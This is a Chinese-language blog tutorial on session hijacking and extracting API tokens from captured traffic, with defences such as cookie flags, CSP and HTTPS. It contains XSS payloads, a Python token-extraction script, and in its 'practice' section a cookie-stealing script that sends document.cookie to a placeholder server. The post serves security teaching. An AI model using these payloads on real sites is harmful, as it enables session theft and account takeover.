发布于admin

API Token 提取与会话劫持 (Session Hijacking):如何在流量中识别和提取会话令牌?

嘿,大家好!今天咱们来聊点刺激的——API Token 提取与会话劫持,保证让你听完冷汗直冒,然后默默地检查自己的代码和网络配置。

开场白:令牌的诱惑

想象一下,你是一家银行的安全主管,你的任务是保护用户的银行账户。 用户的账户密码就相当于银行金库的钥匙,非常重要! 那么token是什么呢? token 就相当于用户进入银行大厅后,保安发给你的一个临时通行证,有了这个通行证,你就可以在银行大厅里办理各种业务,而不需要每次都出示你的“钥匙”(账户密码)。

API Token 和 Session Token 就像互联网世界的通行证,它们允许用户在一段时间内访问受保护的资源,而无需重复验证身份。但如果这些通行证落入坏人之手,那可就惨了。

第一部分:API Token 的那些事儿

API Token 是一种用于身份验证的字符串,通常由服务器生成并颁发给客户端。客户端在后续的请求中携带这个 Token,服务器通过验证 Token 来确认客户端的身份。

  1. Token 的类型

    • Bearer Token: 最常见的类型,通常在 HTTP 请求头的 Authorization 字段中携带,格式为 Authorization: Bearer <token>
    • API Key: 比较简单的 Token,通常作为 URL 参数或 HTTP 请求头的一部分传递。
    • JWT (JSON Web Token): 自包含的 Token,包含了用户信息和签名,服务器可以离线验证 Token 的有效性。

  2. Token 的存储

    • 客户端存储: 浏览器 Cookie、LocalStorage、SessionStorage,移动 App 的 SharedPreferences 等。
    • 服务器端存储: 数据库、缓存(Redis、Memcached)。

  3. Token 的安全性

    • 加密传输: 使用 HTTPS 协议,防止 Token 在传输过程中被窃听。
    • Token 过期时间: 设置合理的过期时间,减少 Token 被滥用的风险。
    • Token 吊销机制: 当用户退出登录或账户被盗时,可以立即吊销 Token。
    • Token 存储安全: 对存储 Token 的介质进行保护,防止 Token 被非法访问。

第二部分:会话劫持 (Session Hijacking) 的套路

会话劫持是指攻击者通过某种手段获取用户的 Session ID,然后冒充用户进行操作。Session ID 通常存储在 Cookie 中,因此攻击者主要通过窃取 Cookie 来实现会话劫持。

  1. XSS (Cross-Site Scripting)

    XSS 是一种常见的 Web 安全漏洞,攻击者通过在受信任的网站上注入恶意脚本,当用户访问该页面时,恶意脚本会在用户的浏览器中执行,从而窃取用户的 Cookie。

    • 反射型 XSS: 攻击者将恶意脚本作为 URL 参数传递给服务器,服务器将恶意脚本返回给浏览器执行。

      // 示例:反射型 XSS
// 攻击者构造的 URL:http://example.com/search?q=<script>alert(document.cookie)</script>
// 当用户访问该 URL 时,浏览器会执行 alert(document.cookie),从而暴露用户的 Cookie。

    • 存储型 XSS: 攻击者将恶意脚本存储在服务器的数据库中,当其他用户访问包含恶意脚本的页面时,恶意脚本会在用户的浏览器中执行。

      // 示例:存储型 XSS
// 攻击者在留言板上发布包含恶意脚本的留言:<script>alert(document.cookie)</script>
// 当其他用户访问留言板时,浏览器会执行 alert(document.cookie),从而暴露用户的 Cookie。

    • DOM Based XSS: 攻击者通过修改页面的 DOM 结构来注入恶意脚本。

      // 示例:DOM Based XSS
// 攻击者构造的 URL:http://example.com/page#<img src=x onerror=alert(document.cookie)>
// 页面 JavaScript 代码:document.getElementById('content').innerHTML = location.hash.substring(1);
// 当用户访问该 URL 时,location.hash.substring(1) 会被插入到 #content 元素中,从而执行恶意脚本。

    如何防御 XSS?

    • 输入验证: 对用户输入的数据进行严格的验证,过滤掉恶意字符。
    • 输出编码: 对输出到页面的数据进行编码,防止恶意脚本被执行。
    • 使用 CSP (Content Security Policy): 通过 HTTP 响应头 Content-Security-Policy 限制浏览器可以加载的资源,防止恶意脚本被加载。

  2. 中间人攻击 (Man-in-the-Middle Attack)

    中间人攻击是指攻击者在客户端和服务器之间建立一个中间通道,窃听或篡改双方的通信数据。如果用户使用不安全的 Wi-Fi 网络,攻击者可以通过中间人攻击窃取用户的 Cookie。

    Client <--> Attacker <--> Server

    如何防御中间人攻击?

    • 使用 HTTPS 协议: 对通信数据进行加密,防止被窃听。
    • 使用 VPN (Virtual Private Network): 创建一个加密的隧道,保护用户的网络流量。
    • 避免使用不安全的 Wi-Fi 网络: 尽量使用受信任的网络,避免使用公共 Wi-Fi 网络。

  3. Cookie 窃取

    • HTTP Only Cookie: 设置 Cookie 的 HttpOnly 属性为 true,可以防止客户端脚本(如 JavaScript)访问 Cookie,从而降低 XSS 攻击的风险。

      Set-Cookie: sessionid=xxxxxxxx; HttpOnly

    • Secure Cookie: 设置 Cookie 的 Secure 属性为 true,可以确保 Cookie 只能通过 HTTPS 连接传输,防止被中间人攻击窃取。

      Set-Cookie: sessionid=xxxxxxxx; Secure

    • SameSite Cookie: 设置 Cookie 的 SameSite 属性可以防止 CSRF (Cross-Site Request Forgery) 攻击。

      • SameSite=Lax: Cookie 在同站点请求和部分跨站点请求中发送。
      • SameSite=Strict: Cookie 只在同站点请求中发送。
      • SameSite=None: Cookie 在所有请求中发送,但必须同时设置 Secure 属性。
      Set-Cookie: sessionid=xxxxxxxx; SameSite=Strict

第三部分:如何在流量中识别和提取 Token

现在,咱们来点干货,看看如何从网络流量中识别和提取 Token。

  1. 使用 Wireshark 抓包

    Wireshark 是一款强大的网络抓包工具,可以捕获网络中的所有数据包,并进行分析。

    • 安装 Wireshark: 在你的电脑上安装 Wireshark。
    • 启动 Wireshark: 启动 Wireshark,选择要抓包的网络接口。
    • 过滤流量: 使用过滤条件,只捕获包含 Token 的流量。例如,可以使用 http.request.method == "POST" and http.content_type contains "application/json" 过滤 POST 请求,并且 Content-Type 为 application/json 的流量。
    • 分析数据包: 分析捕获的数据包,查找 HTTP 请求头或请求体中包含的 Token。

  2. 使用 Burp Suite 代理

    Burp Suite 是一款专业的 Web 安全测试工具,可以作为 HTTP 代理服务器,拦截和修改 HTTP 请求和响应。

    • 配置 Burp Suite: 配置 Burp Suite 作为浏览器的 HTTP 代理。
    • 浏览网站: 使用浏览器访问目标网站,Burp Suite 会拦截所有的 HTTP 请求和响应。
    • 分析流量: 在 Burp Suite 中分析拦截的 HTTP 请求和响应,查找包含 Token 的数据。
    • 修改流量: 可以修改 HTTP 请求,模拟攻击,测试网站的安全性。

  3. 使用 Fiddler 抓包

    Fiddler 也是一款流行的 HTTP 调试工具,可以捕获和分析 HTTP 流量。

    • 安装 Fiddler: 在你的电脑上安装 Fiddler。
    • 启动 Fiddler: 启动 Fiddler,Fiddler 会自动作为系统的 HTTP 代理。
    • 浏览网站: 使用浏览器访问目标网站,Fiddler 会拦截所有的 HTTP 请求和响应。
    • 分析流量: 在 Fiddler 中分析拦截的 HTTP 请求和响应,查找包含 Token 的数据。

  4. 代码示例:使用 Python 提取 Token

    import requests
import re

def extract_token_from_response(response):
    """从 HTTP 响应中提取 Token"""
    # 尝试从 HTTP 响应头中提取 Token
    auth_header = response.headers.get('Authorization')
    if auth_header and auth_header.startswith('Bearer '):
        token = auth_header[7:]  # 去掉 "Bearer " 前缀
        return token

    # 尝试从 JSON 响应体中提取 Token
    try:
        json_data = response.json()
        token = json_data.get('token')  # 假设 Token 的 key 是 "token"
        if token:
            return token
    except ValueError:
        pass  # 响应体不是 JSON 格式

    # 尝试使用正则表达式提取 Token
    text = response.text
    token_match = re.search(r'"token":s*"([^"]+)"', text) # 更严格的匹配,确保匹配的是 "token" 键的值
    if token_match:
        token = token_match.group(1)
        return token

    return None

def extract_token_from_html(html_content):
    """从 HTML 内容中提取 Token(如果 Token 嵌入在 HTML 中)"""
    # 示例:假设 Token 存储在一个隐藏的 input 字段中
    token_match = re.search(r'<input type="hidden" name="api_token" value="([^"]+)">', html_content)
    if token_match:
        return token_match.group(1)

    # 更多提取 Token 的逻辑...
    return None

# 示例:发送 HTTP 请求,提取 Token
url = 'https://example.com/api/login'
data = {'username': 'testuser', 'password': 'password123'}
response = requests.post(url, data=data)

if response.status_code == 200:
    token = extract_token_from_response(response)
    if token:
        print('提取到的 Token:', token)
    else:
        print('未找到 Token')

    # 如果返回的是 HTML 页面
    # html_token = extract_token_from_html(response.text)
    # if html_token:
    #     print("从 HTML 中提取到的 Token:", html_token)

else:
    print('请求失败:', response.status_code)

# 示例:从已经捕获的流量中提取 Token
captured_traffic = '{"token": "abcdefg123456"}' #模拟已经捕获的json 数据
response = requests.Response()
response._content = bytes(captured_traffic, 'utf-8') # 将字符串转换为 bytes
response.headers['Content-Type'] = 'application/json' # 设置 Content-Type
token = extract_token_from_response(response)
if token:
    print('从已捕获的流量中提取到的 Token:', token)
else:
    print('未找到 Token')

captured_html = '<input type="hidden" name="api_token" value="hijklmn789012">'  # 模拟已经捕获的 HTML 数据
html_token = extract_token_from_html(captured_html)
if html_token:
    print("从已捕获的 HTML 中提取到的 Token:", html_token)
else:
    print("HTML 中未找到 Token")

    代码解释:

    • extract_token_from_response(response): 从 HTTP 响应中提取 Token。首先尝试从 Authorization 头中提取,然后尝试从 JSON 响应体中提取,最后使用正则表达式提取。
    • extract_token_from_html(html_content): 从 HTML 内容中提取 Token。示例代码假设 Token 存储在一个隐藏的 input 字段中。
    • 示例代码演示了如何发送 HTTP 请求,提取 Token,以及如何从已经捕获的流量中提取 Token。

第四部分:防御措施

  1. 加强身份验证: 使用强密码、多因素身份验证等措施,提高用户账户的安全性。
  2. 保护 Token: 使用 HTTPS 协议加密传输 Token,设置合理的过期时间,使用 HTTP Only Cookie 和 Secure Cookie。
  3. 防御 XSS 攻击: 对用户输入的数据进行严格的验证和编码,使用 CSP。
  4. 防御 CSRF 攻击: 使用 SameSite Cookie,添加 CSRF Token。
  5. 定期安全审计: 定期对网站和应用程序进行安全审计,及时发现和修复安全漏洞。
  6. 教育用户: 提高用户的安全意识,教育用户不要使用不安全的 Wi-Fi 网络,不要点击不明链接。

第五部分:实战演练

假设你发现一个网站存在 XSS 漏洞,你可以尝试使用以下步骤进行会话劫持:

  1. 找到 XSS 漏洞: 在网站的输入框中输入 <script>alert(document.cookie)</script>,如果弹出一个包含 Cookie 的对话框,说明网站存在 XSS 漏洞。

  2. 构造恶意脚本: 构造一个恶意脚本,将用户的 Cookie 发送到你的服务器。

    // 恶意脚本
var cookie = document.cookie;
var img = new Image();
img.src = 'http://your-server.com/steal?cookie=' + cookie;

  3. 注入恶意脚本: 将恶意脚本注入到网站中。

  4. 窃取 Cookie: 当其他用户访问包含恶意脚本的页面时,恶意脚本会将用户的 Cookie 发送到你的服务器。

  5. 使用 Cookie 登录: 使用窃取的 Cookie 登录用户的账户。

记住,以上只是演示攻击过程,请勿用于非法用途!

结语:安全之路,任重道远

API Token 提取与会话劫持是 Web 安全领域中常见的攻击手段。作为开发者和安全人员,我们需要时刻保持警惕,不断学习新的安全知识,采取有效的防御措施,保护用户的数据安全。

希望今天的讲座对你有所帮助。记住,安全不是一蹴而就的,而是一个持续不断的过程。 只有不断学习和实践,才能在这个充满挑战的网络世界中立于不败之地。 以后有机会再和大家分享其他安全知识,拜拜!

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注